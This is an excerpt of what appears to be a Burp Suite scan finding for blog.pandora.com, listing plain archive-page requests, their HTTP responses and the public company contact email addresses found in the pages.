Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:59 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:15 GMT
ETag: "79e05f-4714-498819df317c0"
Accept-Ranges: bytes
Content-Length: 18196
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
<p>Over the course of the last 8 weeks we've been introduced to an incredible group of Pandora listeners from all over the world. Whether it's been here in the Pandora blog comments, via pandora-support@pandora.com, or out there in the blogosphere we've virtually "met" an amazing and passionate group of music lovers.</p> ...[SNIP]...
The following email addresses were disclosed in the response:
pandora-support@pandora.com
tour@pandora.com
Request
GET /pandora/archives/2006/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:13 GMT
ETag: "79e049-7adb-498819dd49340"
Accept-Ranges: bytes
Content-Length: 31451
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a> ...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]...
<p>Our use of existing namespaces is one area where I'm particularly interested in feedback during the beta period. Drop a note to pandora-support@pandora.com with "RSS Beta" in the subject line if you'd like to share your perspectives and feedback with us. I'm looking forward to talking with you about it. You are also invited to leave your comments here on ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/2006/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Tue, 04 Jan 2011 19:54:13 GMT
ETag: "79e0a4-16dfb-4990aa1f8c340"
Accept-Ranges: bytes
Content-Length: 93691
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
<p>Please RSVP by sending an email to tour@pandora.com with DC in the subject line. Hope to see you there!</p> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/2006/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:44 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Fri, 07 Jan 2011 22:22:10 GMT
ETag: "79e06d-5e17-499490c9b2880"
Accept-Ranges: bytes
Content-Length: 24087
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
the various meetings and talks. I left town energized and armed with a bunch of great new ideas. I've posted some pix and thoughts below... if you have any you'd like me to add, please send 'em in - tour@pandora.com</p> ...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a> ...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a> ...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/2008/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:24 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:01 GMT
ETag: "7cc4d2-5f78-498819d1d7840"
Accept-Ranges: bytes
Content-Length: 24440
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with Las Vegas in the subject line.</p> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/2008/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:24 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:01 GMT
ETag: "7cc519-72fa-498819d1d7840"
Accept-Ranges: bytes
Content-Length: 29434
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with CLEVELAND in the subject line.</p> ...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with BOSTON in the subject line.</p> ...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with AUSTIN in the subject line.</p> ...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with SYRACUSE in the subject line.</p> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/2008/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:21 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Fri, 07 Jan 2011 22:22:17 GMT
ETag: "7cc541-60d8-499490d05f840"
Accept-Ranges: bytes
Content-Length: 24792
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with SANTA MONICA in the subject line.</p> ...[SNIP]...
The following email addresses were disclosed in the response:
beta-feedback@pandora.com
tour@pandora.com
Request
GET /pandora/archives/2008/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:20 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Fri, 07 Jan 2011 22:22:16 GMT
ETag: "7cc52e-6d43-499490cf6b600"
Accept-Ranges: bytes
Content-Length: 27971
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with PALO ALTO in the subject line.</p> ...[SNIP]... <a href="mailto:beta-feedback@pandora.com">beta-feedback@pandora.com</a> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/2008/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:19 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Fri, 07 Jan 2011 22:22:17 GMT
ETag: "7cc1aa-75bc-499490d05f840"
Accept-Ranges: bytes
Content-Length: 30140
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with SONOMA in the subject line.</p> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/2008/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:18 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:25:57 GMT
ETag: "7cc170-3e7e-498819ce06f40"
Accept-Ranges: bytes
Content-Length: 15998
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with DALLAS in the subject line.</p> ...[SNIP]...
The following email addresses were disclosed in the response:
event@pandora.com
tour@pandora.com
Request
GET /pandora/archives/2008/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:25:57 GMT
ETag: "7cc08c-6e61-498819ce06f40"
Accept-Ranges: bytes
Content-Length: 28257
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with PITTSBURGH in the subject line.</p> ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with "DES MOINES" in the subject line.</p> ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with "NEW YORK" in the subject line.</p> ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with "PHILADELPHIA" in the subject line.</p> ...[SNIP]... <p>Please RSVP by sending us an email to event@pandora.com with BBQ in the subject line. Make sure to let us know if you plan to bring a guest--more the merrier! Full details below: </p> ...[SNIP]...
The following email address was disclosed in the response:
event@pandora.com
Request
GET /pandora/archives/2008/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:25:57 GMT
ETag: "7cc199-4a9d-498819ce06f40"
Accept-Ranges: bytes
Content-Length: 19101
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <b>Please RSVP to let us know you'll be there by sending an email to event@pandora.com with "APPLE STORE" in the subject line.</b> ...[SNIP]...
The following email address was disclosed in the response:
pandora-support@pandora.com
Request
GET /pandora/archives/2009/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:05 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:25:55 GMT
ETag: "7cc203-710f-498819cc1eac0"
Accept-Ranges: bytes
Content-Length: 28943
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <p>Here are the full release notes for 1.1. As usual, if you have any problems please feel free to leave a comment here or email our support team at pandora-support@pandora.com</p> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/2010/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:06 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:25:52 GMT
ETag: "80c008-269f-498819c942400"
Accept-Ranges: bytes
Content-Length: 9887
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <p> We're having Pandora town-halls in Denver and Atlanta next week. If you're in one of those cities and haven't gotten your email invite, send a note to 'tour@pandora.com' and we'll put you on the list.</p> ...[SNIP]... you'll come and hang and chat for an hour and a bit, that's usually how long the town halls last. And if you're in another city and think it is time we had a town hall there, let us know by emailing 'tour@pandora.com,' and we'll add it to the list!</p> ...[SNIP]... </strong>: Send email to tour@pandora.com with number of guests<br /> ...[SNIP]... </strong> Send email to tour@pandora.com with number of guests<br /> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/2010/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:03:53 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Fri, 07 Jan 2011 19:30:15 GMT
ETag: "888013-3e68-49946a5c8bfc0"
Accept-Ranges: bytes
Content-Length: 15976
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... een (any recommendations you have about cool places to stop and stretch legs or get a cup of coffee or a great meal between Grand Forks and Sioux Falls or Sioux Falls and Omaha, please let us know at tour@pandora.com). The response from the local audience has been wonderful, although no one has yet offered to make sure there's no snow...</p> ...[SNIP]... <p>So if you have friends you think might want to drop in, point them to the info below and ask them to email us at tour@pandora.com to RSVP. Not everyone on Pandora opts in to get emails so we always miss people that we wish we could reach. </p> ...[SNIP]...
The following email address was disclosed in the response:
pandora-support@pandora.com
Request
GET /pandora/archives/2010/11/fantastic-fargo.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:03:51 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Tue, 04 Jan 2011 19:54:17 GMT
ETag: "888014-726a-4990aa235cc40"
Accept-Ranges: bytes
Content-Length: 29290
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <p>@maurice -- it sounds like you're trying to listen on an in-the-home device. Please write to pandora-support@pandora.com for quick assistance with any technical issues.</p> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/2010/11/town-halls-this.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:03:53 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Tue, 04 Jan 2011 19:54:17 GMT
ETag: "888015-38f6-4990aa235cc40"
Accept-Ranges: bytes
Content-Length: 14582
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... een (any recommendations you have about cool places to stop and stretch legs or get a cup of coffee or a great meal between Grand Forks and Sioux Falls or Sioux Falls and Omaha, please let us know at tour@pandora.com). The response from the local audience has been wonderful, although no one has yet offered to make sure there's no snow...</p> ...[SNIP]... <p>So if you have friends you think might want to drop in, point them to the info below and ask them to email us at tour@pandora.com to RSVP. Not everyone on Pandora opts in to get emails so we always miss people that we wish we could reach. </p> ...[SNIP]...
The following email addresses were disclosed in the response:
event@pandora.com
pandora-support@pandora.com
tim.westergren@pandora.com
tour@pandora.com
Request
GET /pandora/archives/california/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:21 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:30 GMT
ETag: "7cc4ae-c72a-49881a26b8080"
Accept-Ranges: bytes
Content-Length: 50986
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
